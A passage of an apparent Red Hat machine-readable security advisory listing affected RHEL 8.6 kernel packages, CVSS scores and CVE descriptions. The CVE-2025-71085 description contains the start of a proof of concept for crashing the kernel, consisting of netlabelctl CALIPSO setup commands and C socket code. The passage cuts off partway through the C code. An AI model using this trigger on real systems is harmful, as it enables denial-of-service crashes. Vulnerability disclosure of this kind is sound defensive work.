            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "kernel: sctp: avoid NULL dereference when chunk data buffer is missing"
    },
    {
      "cve": "CVE-2025-71085",
      "cwe": {
        "id": "CWE-190",
        "name": "Integer Overflow or Wraparound"
      },
      "discovery_date": "2026-01-13T00:00:00+00:00",
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2429026"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n        netlabelctl map del default\n        netlabelctl calipso add pass doi:7\n        netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n        Then run the following PoC:\n\n        int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n        // setup msghdr\n        int cmsg_size = 2;\n        int cmsg_len = 0x60;\n        struct msghdr msg;\n        struct sockaddr_in6 dest_addr;\n        struct cmsghdr * cmsg = (struct 